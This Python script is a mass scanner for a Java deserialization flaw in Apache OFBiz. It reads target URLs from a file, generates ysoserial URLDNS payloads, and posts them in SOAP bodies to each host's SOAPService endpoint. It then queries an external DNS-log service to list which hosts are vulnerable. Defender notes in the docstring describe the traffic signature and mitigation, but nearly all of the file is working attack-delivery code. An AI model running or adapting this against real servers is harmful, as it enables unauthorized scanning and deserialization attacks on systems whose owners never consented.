#coding:utf-8
import binascii
import os
import requests
import urllib3
import uuid
# Silence urllib3's InsecureRequestWarning globally: the POST to each target
# below is sent with verify=False, so the server's TLS certificate is never
# validated and every such request would otherwise print a warning.
urllib3.disable_warnings()
def main() -> None:
    """Check each URL in target.txt for a SOAPService endpoint that deserializes
    a caller-supplied Java object, using a DNS callback as the detection signal.

    Prerequisites (checked at the top): a ``target.txt`` with one base URL per
    line and a ``ysoserial.jar`` in the working directory. A fresh DNS-log
    domain is obtained from the third-party service ``dns.xn--9tr.com``; the
    service is queried again at the end to see which per-target tokens were
    resolved. Targets judged vulnerable are written to ``<uuid>.txt``.

    Defender notes (what this traffic looks like and how to blunt it):
      * Request signature: an HTTP POST to ``/webtools/control/SOAPService``
        whose SOAP body contains ``<map-HashMap>`` / ``<cus-obj>`` with a long
        hex blob (the hex-encoded serialized Java object produced by
        ysoserial's URLDNS gadget). The request carries no credentials.
      * Host signature: the application server performing a DNS lookup for a
        32-hex-character label under a domain it has no business resolving.
      * Mitigation: upgrade OFBiz to a release that no longer deserializes
        ``<cus-obj>`` content from this endpoint (fixed version not given on
        this page; see the vendor advisory), and restrict network access to
        ``/webtools/`` to administrators.

    Side effects: runs ``java -jar .\\ysoserial.jar`` once per target, writes
    ``tmp`` and ``<uuid>.txt`` in the working directory, and sends the target
    list (by way of per-target tokens) to the external DNS-log service.
    """
    if(not os.path.exists("target.txt")):
        exit("put url in target.txt! ")
    if(not os.path.exists("ysoserial.jar")):
        exit("where is ysoserial.jar?")
    # Ask the DNS-log service for a fresh callback domain. Note that this
    # hands scan metadata to a third party and that the response is trusted
    # as-is (only the length of its first label is sanity-checked below).
    dnslogdomain = requests.get("https://dns.xn--9tr.com/new_gen").text
    if(len(dnslogdomain.split(".")[0])!=8):
        exit("Maybe `dns.xn--9tr.com` is down..")
    print("[!] Your DnsLog Domain Is `{0}`".format(dnslogdomain))
    # URL that later returns the list of names resolved under this domain.
    dnslogresurl = "https://dns.xn--9tr.com/"+dnslogdomain.split(".")[0]
    with open("target.txt")as f:
        urls = f.readlines()
    # target URL -> correlation token; the token is the DNS label that will
    # show up in the log if the target deserialized the payload.
    uuids={}
    print("\n")
    print(" payload发送开始 ".center(50,"-"))
    for url in urls:
        url = url.strip()
        uid = uuid.uuid1().hex
        uuids[url]=uid
        # Build the URLDNS gadget with ysoserial and capture it in ./tmp.
        # Caveats visible here: the command is a shell string passed to
        # os.popen; the path uses a Windows-style backslash, and "\y" is not a
        # valid escape so it is kept literally (newer Pythons warn about it).
        cmd = "java -jar .\ysoserial.jar URLDNS http://{0}.{1} > tmp".format(uid,dnslogdomain)
        r = os.popen(cmd)   
        # close() waits for the child; its exit status is discarded, so a
        # failed ysoserial run leaves whatever is in ./tmp to be sent below.
        r.close()  
        with open("tmp",'rb') as f:
            payload = binascii.hexlify(f.read())
        # SOAP body for the endpoint; {0} is the hex of the serialized object.
        # The map-Value URL is inert filler; detection relies on the DNS
        # lookup triggered when the map-Key object is deserialized.
        data = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
            <soapenv:Header/>
            <soapenv:Body>
            <ser>
        <map-HashMap>
            <map-Entry>
                <map-Key>
                    <cus-obj>{0}</cus-obj>
                </map-Key>
                <map-Value>
                    <std-String value="http://baidu.com"/>
                </map-Value>
            </map-Entry>
        </map-HashMap>
            </ser>
            </soapenv:Body>
            </soapenv:Envelope>
            '''.format(payload.decode())
        headers = {
            "user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"
        }
        try:
            print("[-] Send payload to {0}".format(url))
            # The base URL from target.txt is used verbatim (no scheme check);
            # TLS verification is off and the request is capped at 5 seconds.
            requests.post(url+"/webtools/control/SOAPService",data=data,verify=False,headers=headers,timeout=5)
        except:
            # Bare except: any failure for this target (connection error,
            # timeout, even KeyboardInterrupt) is silently skipped.
            pass
    print(" payload发送完毕 ".center(50,"-"))
    print("\n")
    print("---".center(50,"-"))
    success=[]
    # Single read of the DNS-log record immediately after the send loop.
    res = requests.get(dnslogresurl).text
    for target in uuids:
        # A target counts as vulnerable if its token appears anywhere in the
        # DNS-log response text (plain substring match).
        if(uuids[target] in res):
            print("[+] {0} 漏洞存在".format(target))
            success.append(target)
        else:
            print("[!] {0} 漏洞不存在".format(target))
    print("---".center(50,"-"))
    # Persist the positives under a random file name in the working directory.
    filename = uuid.uuid1().hex+".txt"
    with open(filename,"w") as f:
        f.write("\n".join(success))
        print("[*] put res in {0}".format(filename))

# Script entry point: main() reads target.txt and ysoserial.jar from, and
# writes tmp and <uuid>.txt into, the current working directory.
if __name__ == "__main__":
    main()